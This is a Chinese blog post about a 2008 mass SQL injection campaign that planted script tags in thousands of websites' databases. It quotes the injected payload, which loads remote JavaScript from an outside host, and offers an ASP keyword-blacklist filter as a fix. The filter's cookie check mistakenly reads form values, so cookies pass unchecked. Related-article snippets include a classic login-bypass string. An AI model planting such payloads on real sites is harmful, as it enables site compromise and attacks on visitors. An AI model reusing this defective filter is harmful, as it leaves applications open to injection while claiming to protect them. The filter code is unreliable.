解决大范围SQL注入攻击的问题

最新推荐文章于 2023-03-09 11:01:29 发布
最新推荐文章于 2023-03-09 11:01:29 发布
阅读量91 收藏
点赞数
文章标签: 数据库

据IDG新闻<nobr><strong class="kgb" οnmοuseοver='isShowAds = true;isShowAds2 = true;KeyGate_ads.Move(this,"","%u4E00%u6B3E%u5F00%u6E90%u7684%u6027%u80FD%u6D4B%u8BD5%u5DE5%u5177","-100849","服务","%u5C06%20Ajax%20%u7528%u4E8E%u591A%u5A92%u4F53","http%3A//ibm.csdn.net/ISN_J.aspx%3Faction%3DJMP%26pointid%3D2473", event)' style="BORDER-TOP-WIDTH: 0px; FONT-WEIGHT: normal; BORDER-LEFT-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; CURSOR: hand; COLOR: #0000ff; BORDER-RIGHT-WIDTH: 0px; TEXT-DECORATION: underline" οnclick='javascript:window.open("http://s4.17luntan.com/ClickPortal/WebClick.aspx?id=-100849&amp;k=%u670D%u52A1&amp;siteid=0098295a-e262-40f7-ae50-7a6fbbdb678b&amp;url=http%3A//news.csdn.net/n/20080520/116114.html&amp;gourl=http%3A//ibm.csdn.net/ISN_J.aspx%3Faction%3DJMP%26pointid%3D2473&amp;parm=2B1BAADE34BC1B95993FB90432181245BDB9C2B297303504&amp;alliedsiteid=0");' οnmοuseοut="isShowAds = false;isShowAds2 = false">服务</strong></nobr>5月19日报道,中国大陆和中国台湾地区数以千计的网站正在遭受大规模的SQL注入攻击。由于采用了非常强的SQL注入攻击手段,因此将会给很多目标网站带来不可逆转的破坏,数以千计的网站被卷入到了这次攻击中,截止上周五已经有超过1万个服务器被植入了恶意代码,而其中的大部分都位于中国大陆,还有一少部分位于中国台湾地区。搜房网和深圳汽车大世界网都沦为了上周五的攻击目标。

受到攻击的服务器数据库表中所有字符字段都被加入“"></"></title><script src=http://s.see9.us/s.js></script><!--“通过查询和参考相关材料,用asp语言整理出以下代码可以解决(其他语言可以按其原理重新编写)上述问题,这段代码有三个特点:

1.用lcase防范大写的sql注入代码

2,分别防范来自Request.QueryString,Request.Form,Request.cookies三个方面的危险

3。直接将代码拷进数据库链接文件,例如asp语言的可以添加到conn文件中。

防范代码如下:(希望更多高手提出意见)

SQL_injdata = "'|exec|insert|select|delete|update|count|iframe|script|chr|mid|master|truncate|char|declare|*|%|and"
SQL_inj = split(SQL_Injdata,"|")

'QueryString请求的注入的拦截
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.QueryString(SQL_Get)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
Next
End If


'Get请求的注入的拦截
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.Form(Sql_Post)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
next
end if

'cookies请求的注入的拦截

If Request.cookies<>"" Then
For Each Sql_Post1 In Request.cookies
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.Form(Sql_Post1)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
next
end if

iteye_3759
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入详解
m0_67392811的博客
06-12 5619
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
sql注入攻击问题
离镜的博客
04-11 202
使用login登录成功,即sql攻击: 因为组合在一起的sql语句是: SELECT * FROM user WHERE username='a' or 'a'='a' and password='a' or 'a'='a' 使用login1函数失败: package sunnietest; import java.sql.Connection; import java.sq...
浅谈web安全——SQL注入
夏天的博客(wx:a1024271896)
04-16 2887
SQL注入 SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入攻击SQL注入原理 当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作...
语言对SQL注入的影响
duangduang2020的博客
12-13 336
SQL注入的一些示例及解决SQL注入的方法
weixin_43618785的博客
03-09 8548
解决SQL注入的方法
SpringBoot整合XssFilter,Jsoup等实现请求参数的过滤,处理Xss攻击sql注入.zip
02-09
原理过程 Springboot中会使用FilterRegistrationBean来注册Filter,Filter是Servlet规范里面的,属于容器范围,Springboot中没有web.xml,那Springboot中,不用管Filter是如何交给Ser......处理Xss攻击sql注入.zip
PHP开发中常见的安全问题详解和解决方法(如Sql注入、CSRF、Xss、CC等)
12-19
浅谈Php安全和防Sql注入,防止Xss攻击,防盗链,防CSRF 前言: 首先,笔者不是web安全的专家,所以这不是web安全方面专家级文章,而是学习笔记、细心总结文章,里面有些是我们phper不易发现或者说不重视的东西。所以...
Mycat2数据库中间件-其他
06-11
支持密码加密支持服务降级支持IP白名单支持SQL黑名单、sql注入攻击拦截支持分表(1.6)集群基于ZooKeeper管理,在线升级,扩容,智能优化,大数据处理(2.0开发版)。优点:1、基于阿里巴巴的开源项目Cobar,其稳定...
Mycat数据库中间件 v1.13
04-22
支持SQL黑名单、sql注入攻击拦截 支持分表(1.6) 集群基于ZooKeeper管理,在线升级,扩容,智能优化,大数据处理(2.0开发版)。MyCAT优点1、基于阿里巴巴的开源项目Cobar,其稳定性,可靠性,出色的体系结构和...
WEB应用系统安全规范文档.doc
10-12
14. SQL语句的参数应以变量形式传入,以防止SQL注入攻击。 WEB应用系统安全规范文档是指在WEB应用系统中,为了确保系统的安全性和可靠性,所制定的规范和标准。本文档提供了详细的安全编码规则和指导方针,以帮助...
SQL注入攻击原理及防护方案
zhendaaaaaaaaaa的博客
12-20 2547
1、结构化查询语言(SQL)注入:这种攻击方式通过在正常已有的SQL指令中加入恶意语句,从而改变数据库查询的结果,或者把数据库查询的结果暴露出来。2、动态查询语言(DQL)注入:这种攻击方式通过在正常已有的DQL指令中加入恶意语句,从而改变数据库查询的结果,或者把数据库查询的结果暴露出来。3、指令注入:这种攻击方式通过在正常已有的指令中加入恶意语句,从而改变系统指令的结果,或者把系统指令的结果暴露出来。2、编写安全的SQL语句:编写安全的SQL语句,可以有效的防止SQL注入攻击
安全攻防六:SQL注入,明明设置了强密码,为什么还会被别人登录
运维大湿兄的博客
04-11 1307
在正文之前,让我们先来看一个案例。某天,当你在查看应用的管理后台时,发现有很多异常的操作。接着,你很快反应过来了,这应该是黑客成功登录了管理员账户。于是,你立刻找到管理员,责问他是不是设置了弱密码。管理员很无辜地表示,自己的密码非常复杂,不可能泄漏,但是为了安全起见,他还是立即修改了当前的密码。奇怪的是,第二天,黑客还是能够继续登录管理员账号。问题来了,黑客究竟是怎么做到的呢?你觉得这里面的问题究...
除了sql注入还有哪些常见的网络攻击
mmxgl的博客
04-24 885
引入主题 上一次面试一家公司的安全部门,基础问完之后问到了你了解过哪些网络安全攻击? 作为一个大三的学生,也就是在开发的时候听人说到过sql注入,也简单了解了一下,至于xss更是只知其名,平时忽略了网络安全方面的了解。总结一下比较常见的三种网络攻击方式。 SQL注入 将SQL语句插入到web表单中或URL中,来让服务器执行恶意SQL语句。 解决方法是,使用参数化的SQL,不要使用拼装SQL;可以通过正则表达式对用户的输入进行校验;可以将单引号和双横杠(注释符)进行转换。建议使用#{},而不是${}。 #{}
sql注入攻击
天下莫柔于风的博客
12-19 9439
sql注入攻击的几个步骤。
sql注入攻击(三)sql注入解决办法
cuiyaoqiang的博客
06-11 3352
我们了解了sql注入原理和sql注入过程,今天我们就来了解一下sql注入解决办法。怎么来解决和防范sql注入,由于本人主要是搞java web开发的小程序员,所以这里我只讲一下有关于java web的防止办法。其实对于其他的,思路基本相似。下面我们先从web应用程序的角度来看一下如何避免sql注入:1、普通用户与系统管理员用户的权限要有严格的区分。  如果一个普通用户在使用查询语句中嵌入另一个Dr
SQL注入原理讲解,很不错!
热门推荐
stilling2006的专栏
01-21 39万+
原文地址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。 网络安全成为了现在互联网的焦点,
利用拦截器实现sql防止注入
an341221的专栏
01-29 1万+
web.xml的代码: sqlInjectionFilter com.suning.mcms.web.auth.filter.SqlInjectionFilter sqlInjectionFilter *.do 拦截器的代码: package com.suning.mcms.web.
Java程序员从笨鸟到菜鸟之(一百)sql注入***详解(一)sql注入原理详解
weixin_33701564的博客
10-24 192
前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的错误。其实sql注入漏洞就是一个。作为一个菜鸟小程序员,我对sql注入的东西了解的也不深入,所以抽出时间专门学习了一下。现在把学习成果分享给大家,希望可以帮助大家学习。下面我们就来看一下。 ...
防止SQL注入攻击-学习笔记
guishifoxin的博客
07-18 8596
所谓SQL注入,就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说,它是利用现有应有程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在web 表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 SQL注入是比较常见的网络攻击方式之一,它不是利用...
sql注入解决方法
最新发布
04-27
为了防止SQL注入攻击,可以采取以下几种解决方法: 1. 使用参数化查询(Prepared Statements):参数化查询是一种将SQL语句与参数分开的方法,通过将用户输入的数据作为参数传递给数据库,而不是将其直接拼接到SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值